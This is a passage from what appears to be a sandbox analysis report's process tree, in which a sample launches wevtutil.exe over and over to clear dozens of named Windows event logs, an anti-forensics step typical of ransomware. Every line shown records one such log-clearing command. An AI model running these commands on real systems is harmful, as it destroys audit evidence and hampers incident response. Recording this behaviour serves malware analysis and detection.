    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:2796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:2784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:3176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:3272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:2324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:3240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:3280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:3276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:2092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:2640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:1244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:3332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:2928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:3296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:1460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:3328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:3340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:3112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:1632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:3352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:2264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:2736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:1832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:2708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:2080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:1984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:3392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:1412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:1116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:3376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:3456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:3464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:3536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:3524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:3508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:3584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:3564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:3608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:3644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:3616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:3596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:3684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:3660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:3696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:3724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:1532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:3820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:2204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:3856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:3896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:3844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:3968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:3924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:3980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:4008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:3964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:4000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:4028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:4060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:3084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:3088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:2468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:2860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:2668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:2832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:2144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:2328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:2340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:2352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:2148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:2008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:1020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:2908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:2856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:2528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:3212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:2612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:3036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:2652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:2988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:2304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:2676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:2604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:2536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:3160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:3124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:3228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:2072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:2628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:2692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:2800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:2728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:2552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:1208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:2052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:3180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:2904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:2512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:3252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:2812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:3260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:2996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:3816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:3792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:1016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:2108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:2792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:2656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:2456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:3324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:2168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:1852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:3320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:1132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:3356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:3316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:3348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:2788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:2452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:2584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:2740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:2444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:3444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:3424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:3476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:3416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:3432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:3532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:3448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:3488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:3504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:3512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:3544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:3604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:3568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:3548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:3628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:3632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:3668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:3648
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:3672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:3692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:3728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:3812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:3864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:3892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:3840
- - C:\Windows\system32\wevtutil.exe
